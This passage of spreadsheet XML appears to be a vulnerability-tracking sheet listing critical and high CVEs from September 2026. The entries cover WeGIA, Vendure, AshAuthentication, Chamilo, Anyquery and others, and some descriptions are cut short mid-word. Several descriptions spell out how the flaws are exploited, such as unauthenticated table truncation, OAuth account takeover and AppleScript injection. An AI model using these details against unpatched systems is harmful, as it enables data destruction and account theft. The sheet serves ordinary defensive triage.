          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, the contribution request dispatcher in web/html/contribuicao/controller/control.php accepts attacker-controlled nomeClasse and metodo values without a complete controller and method allowlist, exempts sensitive ContribuicaoLogController operations from authentication, and constructs a controller include path without canonical directory containment. An unauthenticated remote attacker can invoke getContribuicoesLogJSON, sincronizarStatus, registrarFaturas, and other sensitive methods to disclose contribution and donation records or trigger financial workflow operations. A traversal-shaped nomeClasse value can also cause require_once to include an accessible PHP or configuration file outside the intended controller directory, exposing source code, credentials, or other sensitive local data. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54670</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54767</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, web/html/socio/sistema/controller/deletar_socios.php exposes an unauthenticated GET endpoint whose chave parameter is checked only against a hardcoded chave_correta value embedded in the public source repository. A remote attacker who obtains that value can reach the endpoint's TRUNCATE TABLE operations for the endereco, pessoafisica, pessoajuridica, and socio tables without an administrative session or application authorization, permanently destroying member and contributor records. The attack requires the affected tables to exist and the web process database account to possess truncation privileges. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54767</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63472</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr">
        <is>
          <t>3.7.0</t>
        </is>
      </c>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.7.0, ExternalAuthenticationService.createCustomerAndUser in packages/core/src/service/helpers/external-authentication/external-authentication.service.ts selects an existing customer user by emailAddress and attaches a newly presented ExternalAuthenticationMethod without requiring verified to be true. In deployments with a custom external AuthenticationStrategy that forwards an email whose ownership the provider has not verified, an attacker can authenticate with a victim's email and bind the attacker's external identity to the victim's existing account. This can expose orders, addresses, and personal information and permit account changes or orders as the victim. Native-only email and password deployments and external strategies that always require provider-verified email ownership are unaffected, and new-account creation for an unused email remains permitted. This issue is fixed in version 3.7.0.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63472</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76949</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who can plant a remember-me cookie in a victim's browser to replace that victim's authenticated session with one for the attacker's own account.
AshAuthentication.Plug.Helpers.sign_in_using_remember_me/3 skips re-authenticating an already-signed-in visitor by checking the session for "&lt;subject_name&gt;_token", but store_in_session/2 writes that key only when require_token_presence_for_authentication? is enabled and otherwise writes the bare subject name. At the default setting the guard therefore reads a key that is never written, its already-signed-in branch is unreachable, and the remember-me sign-in runs on every request through the per-request browser pipeline plug. A planted remember-me cookie is consequently honoured even for a visitor holding a live authenticated session, so whatever the victim enters afterwards lands in data the attacker controls. The read path in authenticate_resource_from_session/4 selects the key correctly, so the guard and the reader disagree about which key holds the session.
This issue affects ash_authentication: from 4.10.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76949</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82761</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82761</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85500</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Primary Weakness vulnerability in team-alembic AshAuthentication allows an unconfirmed user to obtain a session, defeating a mandatory email confirmation requirement.
AshAuthentication.Strategy.Password.Actions.check_user/2 decides whether the attribute named by require_confirmed_with is set using a bare is_nil(Map.get(user, value)). When that attribute is not selected on the loaded record Map.get/2 returns %Ash.NotLoaded{}, and when a field policy denies it for the current actor it returns %Ash.ForbiddenField{}. Neither is nil, so the rejection branch is skipped and sign-i
require_confirmed_with is enforced in two places, and neither holds in every configuration. sign_in_with_token and register are checked only inside AshAuthentication.Strategy.Password.Actions, not on the action itself, so any caller that invokes the action directly skips the check. An API layer such as AshGraphql or AshJsonApi invokes the action directly, so this applies to the default configuration. Where a check does run it compares the confirmation attribute against nil. That attribute holds %Ash.NotLoaded{} or %Ash.ForbiddenField{} when it sets select_by_default?: false, when an API layer narrows the read's select, or when a field policy hides it from the sign-in actor. Neither struct is nil, so those configurations read every user as confirmed.
This issue affects ash_authentication: from 4.3.8 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85500</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86533</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Insufficient Session Expiration vulnerability in team-alembic AshAuthentication and AshAuthentication Phoenix allows a revoked session to remain fully authenticated.
A resource configured with session_identifier :jti and require_token_presence_for_authentication? disabled stores its session value as &lt;jti&gt;:&lt;subject&gt;. The jti is there so that signing out can revoke that one session. Neither reader consults it: AshAuthentication.Plug.Helpers.authenticate_resource_from_session/4 and AshAuthentication.Phoenix.LiveSession.on_mount/4 both split the value with split_identifier/2, discard the jti and pass the bare subject to AshAuthentication.subject_to_user/3, which reloads the record. The token-presence branch of each function does check its token, calling AshAuthentication.TokenResource.Actions.get_token/3 with the jti and the purpose user. Because the revocation record is never read, neither its revoked state nor its expiry constrains the session, so a session captured before sign-out keeps working.
This issue affects ash_authentication: from 4.9.1 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14; ash_authentication_phoenix: from 2.10.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86533</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88952</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker to be signed in as another user by linking an OAuth2 identity to an account that is not theirs.
AshAuthentication.Strategy.OAuth2.UserResolver.resolve/3 matches an existing account using the register action's upsert_identity keys, then gates linking the incoming provider identity to it on email_trusted?/2, which reads only the provider's email_verified boolean and never compares the provider's email value with the matched account's email. That gate assumes the account was matched by its email field, so under any other upsert_identity it is vacuous and an attacker presenting their own verified email is attached to, and issued a session for, an account matched on some other attribute. The same unguarded gate applies in OAuth2.SignInPreparation on the registration_enabled? false path, where the account is matched by the sign-in action's read filter instead. The upsert also rewrites the matched account's email to the attacker's address, so later account recovery reaches the attacker rather than the owner.
This issue affects ash_authentication: from 4.14.0 before 4.15.0 and from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88952</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91039</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who operates one identity-provider connection of a dynamic_oidc strategy to be signed in as a local user established through a different connection.
The strategy is meant to keep each connection in its own identity namespace by writing every UserIdentity row's strategy field as "&lt;name&gt;/&lt;connection_id&gt;", but that namespacing never takes effect. __connection_id__ is populated only on the ephemeral runtime struct built per request in dynamic_oidc/plug.ex, and DynamicOidc.IdentityChange.change/3 re-fetches the strategy from the compile-time DSL through Info.strategy_for_action, yielding the persisted struct whose __connection_id__ is its defstruct default of nil. OAuth2.identity_strategy_name/1 therefore falls back to the bare strategy name for both the identity write and the reads in oauth2/user_resolver.ex and oauth2/sign_in_preparation.ex. Since the identity resource's unique key is (uid, strategy), one row exists per sub across every connection, and the identity-match branch runs before any email check. Neither strategy handles iss, so nothing else distinguishes the issuers: OpenID Connect Core section 5.7 makes sub unique only within an issuer, so two connections numbering subjects independently share one subject space.
This issue affects ash_authentication: from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91039</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92860</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in rcourtman Pulse up to 6.0.4/6.1.0-rc.4. Affected by this issue is the function fmt.Sprintf of the file /api/security/quick-setup of the component Quick Security Setup Handler. The manipulation of the argument Username results in improper input validation. The attack may be performed from remote. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92860</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45143</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. From 2.0.0 through at least 2.1.0, Chamilo LMS stores private Message.content without server-side sanitization and renders it as HTML in assets/vue/views/message/MessageShow.vue and public/main/template/default/message/view_message.html.twig. An authenticated low-privilege user, including a student, can directly address crafted message content to an administrator because the message creation flow permits a sender to select another user as the recipient. The content executes in the recipient's browser when the recipient opens the routine inbox or message view, without requiring a link click, and can expose session credentials or permit actions as the administrator. This vulnerability is fixed in 2.0.1.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45143</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47252</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, authenticated users with INSERT or UPDATE access to affected macOS virtual tables can execute operating-system commands because the Chrome plugin and equivalent Brave, Edge, and Safari variants interpolate a SQL-controlled URL into AppleScript or JXA source passed to osascript. In plugins/chrome/tabs.go, tabsTable.Insert() passes the URL through fmt.Sprintf(newTabScript, url), and tabsTable.Update() uses fmt.Sprintf(setURLScript, pk, url). A URL containing quote and newline characters can break out of the intended string or property record and append script statements, resulting in arbitrary command execution with the privileges of the anyquery process on the macOS host. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47252</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77903</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9</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2026-09-17</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Microsoft Dataverse allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77903</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88795</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>The wpShopGermany IT-RECHT KANZLEI WordPress plugin before 2.4 does not generate its API authentication token securely, deriving it from data the requester controls and creating it as a side effect of the check that is supposed to validate it, allowing unauthenticated attackers to predict the token and use the access it grants to write arbitrary files, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88795</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92952</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
